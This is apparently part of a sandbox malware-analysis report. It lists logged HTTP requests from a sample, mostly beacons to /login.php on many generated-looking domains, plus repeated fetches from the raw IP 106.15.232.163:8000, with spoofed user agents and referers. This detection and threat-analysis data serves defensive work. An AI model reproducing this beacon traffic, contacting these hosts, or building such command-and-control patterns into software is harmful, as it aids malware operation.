Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20241112-0413-1393-8b92-799b17a46fa8 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345193.2353053
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20241112-0413-1304-9c25-d9b9aac71030 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345193.3163760
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731345193.2353053
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731345193.3163760
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20241112-0413-361d-880c-38de75da0bbf HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345193.2353053; parking_session=420ef3a8-c938-4e4a-99bb-1a08a10d1764
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20241112-0413-3653-b9c7-4bbc444bdc48 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345193.3163760
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
